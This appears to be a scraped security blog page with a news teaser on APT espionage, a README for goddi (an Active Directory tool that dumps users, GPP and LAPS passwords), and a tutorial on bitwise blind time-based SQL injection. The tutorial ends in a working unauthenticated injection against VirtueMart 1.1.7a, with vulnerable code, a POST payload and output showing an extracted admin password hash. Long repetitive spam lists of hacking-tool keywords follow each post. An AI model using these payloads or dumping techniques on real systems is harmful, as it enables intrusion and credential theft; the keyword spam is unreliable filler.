TIME

NEPAL QATAR BELFAST, UK MALAYSIA DUBAI

Sunday, August 30, 2020

APT Hackers Exploit Autodesk 3D Max Software For Industrial Espionage

It's one thing for APT groups to conduct cyber espionage to meet their own financial objectives. But it's an entirely different matter when they are used as "hackers for hire" by competing private companies to make away with confidential information. Bitdefender's Cyber Threat Intelligence Lab discovered yet another instance of an espionage attack targeting an unnamed international

via The Hacker News
This article is the property of Tenochtitlan Offensive Security. Verlo Completo --> https://tenochtitlan-sec.blogspot.com
Continue reading
  1. Nsa Hacker Tools
  2. Usb Pentest Tools
  3. Hacker Tools Github
  4. Growth Hacker Tools
  5. Hacker Tools Github
  6. Hacker Tools For Pc
  7. Pentest Automation Tools
  8. Hack Website Online Tool
  9. Underground Hacker Sites
  10. World No 1 Hacker Software
  11. Ethical Hacker Tools
  12. Hacking App
  13. Hacker Security Tools
  14. Hack Website Online Tool
  15. Pentest Tools Download
  16. Hackrf Tools
  17. Physical Pentest Tools
  18. Hacker Tools For Windows
  19. Hacking Tools Windows 10
  20. Hacker Tools 2020
  21. Hacking Tools Kit
  22. Hacking Tools Pc
  23. Pentest Tools Linux
  24. Pentest Tools For Mac
  25. Hacking Tools 2019
  26. Termux Hacking Tools 2019
  27. Hacker Tools Linux
  28. Hacking Tools Software
  29. Hacker Techniques Tools And Incident Handling
  30. World No 1 Hacker Software
  31. Best Hacking Tools 2020
  32. Hacking Apps
  33. Hacker Tools For Windows
  34. Hacking Tools
  35. Hacker Security Tools
  36. World No 1 Hacker Software
  37. Pentest Tools Online
  38. Hacker Tools 2019
  39. Hack And Tools
  40. Pentest Tools Review
  41. Pentest Tools Website
  42. Pentest Tools Linux
  43. Easy Hack Tools
  44. Hack Tools For Mac
  45. Nsa Hack Tools Download
  46. Pentest Tools Github
  47. Hak5 Tools
  48. Nsa Hack Tools
  49. Hacker Tool Kit
  50. Hacking Tools For Windows
  51. Pentest Tools Url Fuzzer
  52. Free Pentest Tools For Windows
  53. Pentest Box Tools Download
  54. What Is Hacking Tools
  55. Pentest Tools Tcp Port Scanner
  56. Hack Tools Github
  57. Ethical Hacker Tools
  58. Hack Tools Download
  59. Pentest Tools Download
  60. Underground Hacker Sites
  61. Hack Tools For Windows
  62. Pentest Tools Tcp Port Scanner
  63. Hacking Tools Pc
  64. Ethical Hacker Tools
  65. Pentest Tools List
  66. Hacks And Tools
  67. Tools 4 Hack
  68. Hacking Tools For Windows 7
  69. How To Install Pentest Tools In Ubuntu
  70. Hacker Tools 2019
  71. Hacking Tools Windows 10
  72. Pentest Tools Alternative
  73. How To Make Hacking Tools
  74. Hacking Tools Online
  75. Termux Hacking Tools 2019
  76. Hacker Tools 2020
  77. Hacking Tools Usb
  78. Pentest Tools Apk
  79. Hacker Hardware Tools
  80. Hacking Tools Mac
  81. Physical Pentest Tools
  82. Hacking Tools Usb
  83. Ethical Hacker Tools
  84. Hacking Tools Free Download
  85. Hacking Tools For Pc
  86. Hacker Tools For Pc
  87. Pentest Tools Find Subdomains
  88. What Are Hacking Tools
  89. Hack And Tools
  90. Hacker Tools
  91. Hack Tools For Ubuntu
  92. Hacking Tools Github
  93. Hacking Tools Download
  94. Hacker Tools 2019
  95. Pentest Tools Find Subdomains
  96. Pentest Tools For Windows
  97. What Is Hacking Tools
  98. Hacker Tools Free
  99. Hacking Tools
  100. Bluetooth Hacking Tools Kali
  101. Pentest Tools Website
  102. Pentest Box Tools Download
  103. Pentest Tools Url Fuzzer
  104. Pentest Tools Windows
  105. Hacker Tools For Ios
  106. Computer Hacker
  107. Underground Hacker Sites
  108. Tools Used For Hacking
  109. Hack And Tools
  110. Pentest Recon Tools
  111. Hacking Tools For Beginners
  112. Hacking Tools Kit
  113. Hacker
  114. Hacker Tools Free
  115. How To Install Pentest Tools In Ubuntu
  116. Pentest Tools Linux
  117. Hacker Tools Hardware
  118. Pentest Tools Url Fuzzer
  119. Hack Tools For Pc
  120. Pentest Tools Bluekeep
  121. Hacking Tools For Kali Linux
  122. Hack Tools For Windows
  123. Hacker Tools 2020
  124. Pentest Tools For Mac
  125. Hacking Tools And Software
  126. Hacker Tools Github
  127. Hacker Tools For Ios
  128. Hacking Apps
  129. Hack Tools
  130. Hacker Tools Free
  131. Top Pentest Tools
  132. Bluetooth Hacking Tools Kali
  133. Pentest Tools
  134. Hacker Hardware Tools
  135. Hack Tools Online
  136. Pentest Tools Kali Linux
  137. Hack And Tools
  138. Pentest Tools Website Vulnerability
  139. Hacker Tools Free
  140. Pentest Tools Apk
  141. What Are Hacking Tools
  142. Hacker Tools Linux
  143. What Are Hacking Tools
  144. Pentest Tools Url Fuzzer
  145. Hack Tools For Ubuntu
  146. Hacking Apps
  147. Pentest Tools For Mac
  148. How To Hack
  149. Hacker Hardware Tools
  150. Tools 4 Hack
Posted by at No comments:

Goddi (Go Dump Domain Info) - Dumps Active Directory Domain Information



Based on work from Scott Sutherland (@_nullbind), Antti Rantasaari, Eric Gruber (@egru), Will Schroeder (@harmj0y), and the PowerView authors.

Install
Use the executables in the releases section. If you want to build it yourself, make sure that your go environment is setup according to the Go setup doc. The goddi package also uses the below package.
go get gopkg.in/ldap.v2

Windows
Tested on Windows 10 and 8.1 (go1.10 windows/amd64).

Linux
Tested on Kali Linux (go1.10 linux/amd64).
  • umount, mount, and cifs-utils need to be installed for mapping a share for GetGPP
apt-get update
apt-get install -y mount cifs-utils
  • make sure nothing is mounted at /mnt/goddi/
  • make sure to run with sudo

Run
When run, will default to using TLS (tls.Client method) over 636. On Linux, make sure to run with sudo.
  • username: Target user. Required parameter.
  • password: Target user's password. Required parameter.
  • domain: Full domain name. Required parameter.
  • dc: DC to target. Can be either an IP or full hostname. Required parameter.
  • startTLS: Use to StartTLS over 389.
  • unsafe: Use for a plaintext connection.
PS C:\Users\Administrator\Desktop> .\godditest-windows-amd64.exe -username=testuser -password="testpass!" -domain="test.local" -dc="dc.test.local" -unsafe
[i] Begin PLAINTEXT LDAP connection to 'dc.test.local'...
[i] PLAINTEXT LDAP connection to 'dc.test.local' successful...
[i] Begin BIND...
[i] BIND with 'testuser' successful...
[i] Begin dump domain info...
[i] Domain Trusts: 1 found
[i] Domain Controllers: 1 found
[i] Users: 12 found
        [*] Warning: keyword 'pass' found!
        [*] Warning: keyword 'fall' found!
[i] Domain Admins: 4 users found
[i] Enterprise Admins: 1 users found
[i] Forest Admins: 0 users found
[i] Locked Users: 0 found
[i] Disabled Users: 2 found
[i] Groups: 45 found
[i] Domain Sites: 1 found
[i] Domain Subnets: 0 found
[i] Domain Computers: 17 found
[i] Deligated Users: 0 found
[i] Users with passwords not set to expire: 6 found
[i] Machine Accounts with passwords older than 45 days: 18 found
[i] Domain OUs: 8 found
[i] Domain Account Policy found
[i] Domain GPOs: 7 found
[i] FSMO Roles: 3 found
[i] SPNs: 122 found
[i] LAPS passwords: 0 found
[i] GPP enumeration starting. This can take a bit...
[i] GPP passwords: 7 found
[i] CSVs written to 'csv' directory in C:\Users\Administrator\Desktop
[i] Execution took 1.4217256s...
[i] Exiting...

Functionality
StartTLS and TLS (tls.Client func) connections supported. Connections over TLS are default. All output goes to CSVs and are created in /csv/ in the current working directory. Dumps:
  • Domain users. Also searches Description for keywords and prints to a seperate csv ex. "Password" was found in the domain user description.
  • Users in priveleged user groups (DA, EA, FA).
  • Users with passwords not set to expire.
  • User accounts that have been locked or disabled.
  • Machine accounts with passwords older than 45 days.
  • Domain Computers.
  • Domain Controllers.
  • Sites and Subnets.
  • SPNs and includes csv flag if domain admin (a flag to note SPNs that are DAs in the SPN CSV output).
  • Trusted domain relationships.
  • Domain Groups.
  • Domain OUs.
  • Domain Account Policy.
  • Domain deligation users.
  • Domain GPOs.
  • Domain FSMO roles.
  • LAPS passwords.
  • GPP passwords. On Windows, defaults to mapping Q. If used, will try another mapping until success R, S, etc... On Linux, /mnt/goddi is used.


Related articles
  1. Hacking Tools 2020
  2. Pentest Tools Bluekeep
  3. Best Hacking Tools 2019
  4. Hak5 Tools
  5. Hacker Tools
  6. Hack Tools Pc
  7. Hacking Tools Windows
  8. Underground Hacker Sites
  9. Nsa Hack Tools Download
  10. Hacker Tools Free Download
  11. Hacker Tools For Mac
  12. Hacker Security Tools
  13. New Hack Tools
  14. Ethical Hacker Tools
  15. Pentest Tools For Mac
  16. Hacking Apps
  17. Hacker Tools Software
  18. Tools Used For Hacking
  19. Underground Hacker Sites
  20. Hacker Tools Free Download
  21. Hacker Tools
  22. Wifi Hacker Tools For Windows
  23. Hacking Tools For Pc
  24. Hacker Tools Free Download
  25. Nsa Hack Tools
  26. Android Hack Tools Github
  27. Beginner Hacker Tools
  28. Pentest Tools Website Vulnerability
  29. Hacking Tools Kit
  30. Hacker Tools Hardware
  31. Hacks And Tools
  32. Hack App
  33. Hack And Tools
  34. Android Hack Tools Github
  35. Hack Tools For Ubuntu
  36. Hacker Tools Linux
  37. Kik Hack Tools
  38. Hack Tools For Mac
  39. Blackhat Hacker Tools
  40. Tools Used For Hacking
  41. Bluetooth Hacking Tools Kali
  42. Hak5 Tools
  43. Hackers Toolbox
  44. Hacking Tools For Games
  45. Install Pentest Tools Ubuntu
  46. Pentest Tools Apk
  47. Growth Hacker Tools
  48. Hacker Tools Windows
  49. Hack Tools Pc
  50. Hacking Tools
  51. Pentest Tools Find Subdomains
  52. Hacking Tools Online
  53. Hackers Toolbox
  54. Android Hack Tools Github
  55. Hacking Tools
  56. Hacks And Tools
  57. Hacker Techniques Tools And Incident Handling
  58. Top Pentest Tools
  59. Hacking Tools 2019
  60. Pentest Tools Website
  61. How To Make Hacking Tools
  62. Hacking Tools For Mac
  63. Termux Hacking Tools 2019
  64. Hacking Tools Windows
  65. Hackrf Tools
  66. Pentest Tools For Windows
  67. Hack Tools
  68. Hacking Tools
  69. Hacker Tools Free
  70. Pentest Tools For Ubuntu
  71. Free Pentest Tools For Windows
  72. Hacker Techniques Tools And Incident Handling
  73. Hak5 Tools
  74. Physical Pentest Tools
  75. Pentest Tools For Ubuntu
  76. Computer Hacker
  77. Underground Hacker Sites
  78. How To Make Hacking Tools
  79. Hacking Tools Free Download
  80. Hack Tools 2019
  81. Usb Pentest Tools
  82. Nsa Hack Tools
  83. Hacker Search Tools
  84. Hacking Tools For Windows
  85. Hack Tools
  86. Hacking Tools Software
  87. Hack Rom Tools
  88. Hacking Tools Pc
  89. Hacker Tools For Pc
  90. Hacker Search Tools
  91. Kik Hack Tools
  92. Hacker Tools Apk
  93. Pentest Tools For Mac
  94. Hack Tools Download
  95. Pentest Tools Website Vulnerability
  96. Pentest Tools For Mac
  97. Pentest Box Tools Download
  98. Beginner Hacker Tools
  99. Hacker Tools For Pc
  100. Computer Hacker
  101. Blackhat Hacker Tools
  102. Hack Tools Github
  103. Hack Tools Mac
  104. Hack Tools
  105. Hacker Tools Online
  106. Pentest Tools Url Fuzzer
  107. Blackhat Hacker Tools
  108. Blackhat Hacker Tools
  109. Tools Used For Hacking
  110. Hacking Tools
  111. Pentest Tools List
  112. Hacker Tools 2019
  113. Hacker Techniques Tools And Incident Handling
  114. Hacker Tools List
  115. Hacking Tools Free Download
  116. Pentest Tools Apk
  117. Pentest Tools Online
  118. Wifi Hacker Tools For Windows
  119. Beginner Hacker Tools
  120. Hacking Tools Kit
Posted by at No comments:

Bit Banging Your Database

This post will be about stealing data from a database one bit at a time. Most of the time pulling data from a database a bit at a time would not be ideal or desirable, but in certain cases it will work just fine. For instance when dealing with a blind time based sql injection. To bring anyone who is not aware of what a "blind time based" sql injection is up to speed - this is a condition where it is possible to inject into a sql statement that is executed by the database, but the application gives no indication about the result of the query. This is normally exploited by injecting boolean statements into a query and making the database pause for a determined about of time before returning a response. Think of it as playing a game "guess who" with the database.

Now that we have the basic idea out of the way we can move onto how this is normally done and then onto the target of this post. Normally a sensitive item in the database is targeted, such as a username and password. Once we know where this item lives in the database we would first determine the length of the item, so for example an administrator's username. All examples below are being executed on an mysql database hosting a Joomla install. Since the example database is a Joomla web application database, we would want to execute a query like the following on the database:
select length(username) from jos_users where usertype = 'Super Administrator';
Because we can't return the value back directly we have to make a query like the following iteratively:

select if(length(username)=1,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
select if(length(username)=2,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
We would keep incrementing the number we compare the length of the username to until the database paused (benchmark function hit). In this case it would be 5 requests until our statement was true and the benchmark was hit. 

Examples showing time difference:
 mysql> select if(length(username)=1,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
1 row in set (0.00 sec)
mysql> select if(length(username)=5,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
1 row in set (0.85 sec)
Now in the instance of the password, the field is 65 characters long, so it would require 65 requests to discover the length of the password using this same technique. This is where we get to the topic of the post, we can actually determine the length of any field in only 8 requests (up to 255). By querying the value bit by bit we can determine if a bit is set or not by using a boolean statement again. We will use the following to test each bit of our value: 

Start with checking the most significant bit and continue to the least significant bit, value is '65':
value & 128 
01000001
10000000
-----------
00000000 

value & 64
01000001
01000000
-----------
01000000
value & 32
01000001
00100000
-----------
00000000
value & 16
01000001
00010000
--------
00000000
value & 8
01000001
00001000
--------
00000000

value & 4
01000001
00000100
-----------
00000000
value & 2
01000001
00000010
-----------
00000000
value & 1
01000001
00000001
-----------
00000001
The items that have been highlighted in red identify where we would have a bit set (1), this is also the what we will use to satisfy our boolean statement to identify a 'true' statement. The following example shows the previous example being executed on the database, we identify set bits by running a benchmark to make the database pause:

mysql> select if(length(password) & 128,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 64,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (7.91 sec)
mysql> select if(length(password) & 32,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 16,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 8,benchmark(50000000,md5('cc')),0)  from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 4,benchmark(50000000,md5('cc')),0)  from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 2,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 1,benchmark(50000000,md5('cc')),0)  from jos_users;
1 row in set (8.74 sec)
As you can see, whenever we satisfy the boolean statement we get a delay in our response, we can mark that bit as being set (1) and all others as being unset (0). This gives us 01000001 or 65. Now that we have figured out how long our target value is we can move onto extracting its value from the database. Normally this is done using a substring function to move through the value character by character. At each offset we would test its value against a list of characters until our boolean statement was satisfied, indicating we have found the correct character. Example of this:

select if(substring(password,1,1)='a',benchmark(50000000,md5('cc')),0) as query from jos_users;
This works but depending on how your character set that you are searching with is setup can effect how many requests it will take to find a character, especially when considering case sensitive values. Consider the following password hash:
da798ac6e482b14021625d3fad853337skxuqNW1GkeWWldHw6j1bFDHR4Av5SfL
If you searched for this string a character at a time using the following character scheme [0-9A-Za-z] it would take about 1400 requests. If we apply our previous method of extracting a bit at a time we will only make 520 requests (65*8). The following example shows the extraction of the first character in this password:

mysql> select if(ord(substring(password,1,1)) & 128,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 64,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.91 sec)
mysql> select if(ord(substring(password,1,1)) & 32,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.93 sec)
mysql> select if(ord(substring(password,1,1)) & 16,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 8,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 4,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.91 sec)
mysql> select if(ord(substring(password,1,1)) & 2,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 1,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
Again I have highlighted the requests where the bit was set in red. According to these queries the value is 01100100 (100) which is equal to 'd'. The offset of the substring would be incremented and the next character would be found until we reached the length of the value that we found earlier.

Now that the brief lesson is over we can move on to actually exploiting something using this technique. Our target is Virtuemart. Virtuemart is a free shopping cart module for the Joomla platform. Awhile back I had found an unauthenticated sql injection vulnerability in version 1.1.7a. This issue was fixed promptly by the vendor (...I was amazed) in version 1.1.8. The offending code was located in "$JOOMLA/administrator/components/com_virtuemart/notify.php" :


          if($order_id === "" || $order_id === null)
          {
                        $vmLogger->debug("Could not find order ID via invoice");
                        $vmLogger->debug("Trying to get via TransactionID: ".$txn_id);
                        $qv = "SELECT * FROM `#__{vm}_order_payment` WHERE `order_payment_trans_id` = '".$txn_id."'";
                        $db->query($qv);
                        print($qv);
                        if( !$db->next_record()) {
                                $vmLogger->err("Error: No Records Found.");
                        }
The $txn_id variable is set by a post variable of the same name. The following example will cause the web server to delay before returning:


POST /administrator/components/com_virtuemart/notify.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
invoice=1&txn_id=1' or benchmark(50000000,md5('cc'));#  
Now that an insertion point has been identified we can automate the extraction of the "Super Administrator" account from the system:
python vm_own.py "http://192.168.18.131/administrator/components/com_virtuemart/notify.php"
[*] Getting string length
[+] username length is:5
[+] username:admin
[*] Getting string length
[+] password length is:65
[+] password:da798ac6e482b14021625d3fad853337:skxuqNW1GkeWWldHw6j1bFDHR4Av5SfL
The "vm_own.py" script can be downloaded here.


More info


  1. How To Make Hacking Tools
  2. Pentest Tools Find Subdomains
  3. Hacker Tools
  4. Android Hack Tools Github
  5. Pentest Tools List
  6. Hack Tools
  7. Computer Hacker
  8. Hacking Tools For Windows
  9. Hacking Tools Online
  10. Pentest Tools For Android
  11. Hack Tools
  12. Hacking Tools And Software
  13. Hack Tools Online
  14. Best Hacking Tools 2020
  15. Hacking Tools Online
  16. Hack Rom Tools
  17. Pentest Tools Website Vulnerability
  18. Blackhat Hacker Tools
  19. Hacking Tools For Mac
  20. Hacking Tools For Beginners
  21. Pentest Recon Tools
  22. Hack Tools For Pc
  23. Hacking Tools For Pc
  24. Wifi Hacker Tools For Windows
  25. Hacking Tools Online
  26. Pentest Tools Kali Linux
  27. Free Pentest Tools For Windows
  28. Hacker Tools Mac
  29. Hacking Tools Free Download
  30. Hack Tools For Ubuntu
  31. Hacker Tools Free Download
  32. Tools Used For Hacking
  33. Hacking Tools Mac
  34. Pentest Tools Linux
  35. Hack Tools Online
  36. Pentest Tools For Android
  37. Hacker Tools For Mac
  38. Tools For Hacker
  39. Pentest Tools Linux
  40. Hack Tools Mac
  41. Ethical Hacker Tools
  42. Hack Tool Apk
  43. Hacker Tool Kit
  44. Hacker Tools Online
  45. Hacker Tools Online
  46. Ethical Hacker Tools
  47. Physical Pentest Tools
  48. Usb Pentest Tools
  49. Pentest Box Tools Download
  50. Hacking Tools
  51. Pentest Tools Kali Linux
  52. Computer Hacker
  53. Hacking Tools For Kali Linux
  54. Top Pentest Tools
  55. Hack Tools For Mac
  56. Pentest Tools Android
  57. Hacking Tools Download
  58. Hack Tools For Mac
  59. Nsa Hack Tools
  60. Android Hack Tools Github
  61. Github Hacking Tools
  62. Best Hacking Tools 2019
  63. Pentest Reporting Tools
  64. Hack Tools Github
  65. Hacker Techniques Tools And Incident Handling
  66. World No 1 Hacker Software
  67. Hacker Tool Kit
  68. Top Pentest Tools
  69. Hack Tools For Pc
  70. Github Hacking Tools
  71. Hack Tools Online
  72. Pentest Reporting Tools
  73. Hacker Tools Github
  74. Pentest Tools Open Source
  75. Hacker Tools Online
  76. Hacking Tools For Windows
  77. Pentest Tools Nmap
  78. Hacker Tools Linux
  79. Hacking Tools Software
  80. Kik Hack Tools
  81. Hacker Tools Linux
  82. Hacking Tools For Windows
  83. Hack Tool Apk
  84. Hack And Tools
  85. Hacker Tool Kit
Posted by at No comments:
Subscribe to: Posts (Atom)